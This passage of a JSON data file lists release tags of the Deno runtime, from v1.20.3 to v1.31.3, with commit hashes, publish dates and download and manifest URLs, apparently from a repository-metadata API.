wnload_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/